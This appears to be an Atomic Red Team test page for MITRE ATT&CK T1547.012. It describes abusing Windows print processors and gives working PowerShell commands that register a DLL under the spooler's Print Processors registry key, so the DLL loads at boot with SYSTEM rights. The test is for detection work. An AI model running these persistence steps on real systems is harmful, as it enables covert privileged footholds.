# T1547.012 - Boot or Logon Autostart Execution: Print Processors
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/012)
<blockquote>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the <code>AddPrintProcessor</code> API call with an account that has <code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be registered to the print spooler service by adding the <code>HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver</code> Registry key that points to the DLL.

For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the <code>GetPrintProcessorDirectory</code> API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)

The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.</blockquote>

## Atomic Tests

- [Atomic Test #1 - Print Processors](#atomic-test-1---print-processors)


<br/>

## Atomic Test #1 - Print Processors
Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.

Note: The test assumes a x64 Windows operating system.

The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)

**Supported Platforms:** Windows


**auto_generated_guid:** f7d38f47-c61b-47cc-a59d-fc0368f47ed0





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| restart | set to 1 if you want the computer to reboot as part of the test | integer | 0|


#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
net stop spooler
Copy-Item "$PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll" C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
net start spooler
if(#{restart}){
  Restart-Computer
}
```

#### Cleanup Commands:
```powershell
net stop spooler
rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
net start spooler
```





<br/>
